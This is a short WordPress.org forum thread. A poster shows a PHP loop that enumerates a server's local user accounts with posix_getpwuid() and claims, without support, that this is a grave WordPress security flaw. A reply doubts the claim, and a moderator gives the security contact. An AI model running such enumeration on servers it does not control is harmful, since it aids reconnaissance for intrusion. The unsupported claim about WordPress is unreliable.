WordPress.org

Ready to get started?Download WordPress

Forums

posix_getwuid (3 posts)

  1. posix_getwuid
    Member
    Posted 3 years ago #

    A roguish user who can not get back the list of the users via the file / etc. / passwd refreshed of another possibility: he can enumerate them with the function posix_getpwuid (). He questions the system for every ID and so reconstitutes a list of the local users.

    <?php
    for ($i = 0; $i < 6000; $i++)
    {
    if (($tab = @posix_getpwuid($i)) != NULL)
    {
    echo $tab['name'].":";
    echo $tab['passwd'].":";
    echo $tab['uid'].":";
    echo $tab['gid'].":";
    echo $tab['gecos'].":";
    echo $tab['dir'].":";
    echo $tab['shell']."
    ";
    }
    }
    ?>

    This function posix_getpwuid is used by WordPress and is a very important fault of security of WordPress.

  2. Nerx
    Member
    Posted 3 years ago #

    I doubt it disturbs index.php or the wp_admin functions by anyway in the security.

  3. Samuel B
    moderator
    Posted 3 years ago #

    if you think there is a security problem
    security@wordpress.org

Topic Closed

This topic has been closed to new replies.

About this Topic